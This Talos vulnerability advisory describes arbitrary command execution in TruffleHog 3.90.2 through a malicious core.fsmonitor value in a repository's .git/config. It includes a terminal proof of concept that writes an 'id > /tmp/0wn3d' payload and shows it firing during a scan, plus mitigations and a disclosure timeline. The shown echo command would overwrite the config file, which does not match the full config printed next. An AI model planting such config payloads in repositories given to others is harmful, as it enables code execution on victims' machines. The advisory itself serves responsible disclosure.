Talos Vulnerability Report

SUMMARY

An arbitrary code execution vulnerability exists in the git functionality of Truffle Security Co. TruffleHog 3.90.2. A specially crafted repository can lead to a arbitrary code execution. An attacker can provide a malicious respository to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Truffle Security Co. TruffleHog 3.90.2

PRODUCT URLS

TruffleHog - https://trufflesecurity.com/trufflehog

CVSSv3 SCORE

7.8 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-829 - Inclusion of Functionality from Untrusted Control Sphere

DETAILS

TruffleHog is an open-source tool designed to help developers and security teams detect secrets, such as API keys, passwords, and credentials, that may have been accidentally committed to version control systems like Git. It scans repositories for high-entropy strings and patterns that resemble sensitive information, helping organizations prevent data leaks and maintain secure coding practices.

Client-side Git hooks are scripts typically found under the .git/hooks directory.
These hooks are executed locally by Git subcommands to assist with repository maintenance, automation, continuous integration (CI), and other custom tasks.
They are not under the repo’s version control and are not copied with git clone.
However, if a repo is copied file-for-file, such as via tar, cp, or rsync, the hooks will be present on the destination, and there are a variety of situations that can unexpectedly trigger them.
One particularly potentially dangerous hook is controlled via the core.fsmonitor configuration option. This setting allows Git to invoke a custom script or program to optimize file system monitoring performance.
Importantly, the fsmonitor hook is triggered automatically during operations like git status, which is used implicitly by many third-party tools (e.g., IDEs, Git GUIs, or CI agents) without explicit user invocation.
If an attacker manages to inject a malicious core.fsmonitor value into a repository’s .git/config file, for example, by:

• Crafting a malicious Git repository with a specially crafted local configuration,
• Compressing the repository into an archive and delivering it to a victim (e.g., via email or file sharing),
• Having the victim open the repository in a vulnerable application that triggers Git operations like git status,

this can result in arbitrary command execution on the victim’s machine without their knowledge.

The TruffleHog Git repository scanner uses the git client with default settings, which causes Git to read configuration values from the repository’s .git/config file. If a malicious fsmonitor property is present, it may lead to arbitrary command execution, as Git will invoke the specified command automatically during certain operations (e.g., git status). This behavior can be demonstrated using the following test scenario:

tester@tester-Virtual-Machine:~$ mkdir EvilRepo
tester@tester-Virtual-Machine:~$ cd EvilRepo/
tester@tester-Virtual-Machine:~/EvilRepo$ git init
tester@tester-Virtual-Machine:~/EvilRepo$ echo 'fsmonitor = "id > /tmp/0wn3d"' > .git/config
tester@tester-Virtual-Machine:~/EvilRepo$ cat .git/config 
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    fsmonitor = "id > /tmp/0wn3d"

tester@tester-Virtual-Machine:~/EvilRepo$ file /tmp/0wn3d
/tmp/0wn3d: cannot open `/tmp/0wn3d' (No such file or directory)

With such prepared repository we can perfom scan with trufflehog:

tester@tester-Virtual-Machine:~/tools$ ./trufflehog git file:///home/tester/EvilRepo/
 TruffleHog. Unearth your secrets. 

2025-07-28T20:36:25+02:00	info-0	trufflehog	running source	{"source_manager_worker_id": "fpRQ7", "with_units": true}
2025-07-28T20:36:25+02:00	info-0	trufflehog	scanning repo	{"source_manager_worker_id": "fpRQ7", "unit_kind": "dir", "unit": "/home/tester/EvilRepo/", "repo": "/home/tester/EvilRepo/"}
2025-07-28T20:36:25+02:00	info-0	trufflehog	finished scanning	{"chunks": 0, "bytes": 0, "verified_secrets": 0, "unverified_secrets": 0, "scan_duration": "10.608999ms", "trufflehog_version": "3.90.2", "verification_caching": {"Hits":0,"Misses":0,"HitsWasted":0,"AttemptsSaved":0,"VerificationTimeSpentMS":0}}
tester@tester-Virtual-Machine:~/tools$ file /tmp/0wn3d 
/tmp/0wn3d: ASCII text
tester@tester-Virtual-Machine:~/tools$ cat /tmp/0wn3d 
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Client-side git hooks should be disabled by default at the system level. If this is not possible, then affected tools should be patched by adding CLI options to override dangerous config options. Example: git -c core.fsmonitor="" status.

Developers and tooling authors should treat this vector with caution and avoid blindly trusting Git configurations from untrusted sources.

VENDOR RESPONSE

Vendor advisory: https://trufflesecurity.com/blog/contributor-spotlight-adam-reiser-of-cisco-talos

TIMELINE

2025-08-19 - Initial Vendor Contact
2025-08-19 - Vendor Disclosure
2025-10-17 - Vendor Patch Release
2025-10-20 - Public Release